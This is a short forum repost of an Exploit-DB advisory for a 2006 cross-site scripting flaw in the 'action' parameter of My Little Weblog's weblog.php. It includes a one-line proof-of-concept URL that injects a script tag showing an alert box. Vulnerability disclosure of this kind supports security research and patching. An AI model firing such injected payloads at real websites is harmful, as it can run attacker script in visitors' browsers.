Exploit My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29162
Проверка EDB
  1. Пройдено
Автор
THE_EDIT0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6087
Дата публикации
2006-11-21
Код:
source: https://www.securityfocus.com/bid/21238/info

My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script.

www.example.com/weblog.php?action="><script>alert('XSS')</script><
 
Источник
www.exploit-db.com

Похожие темы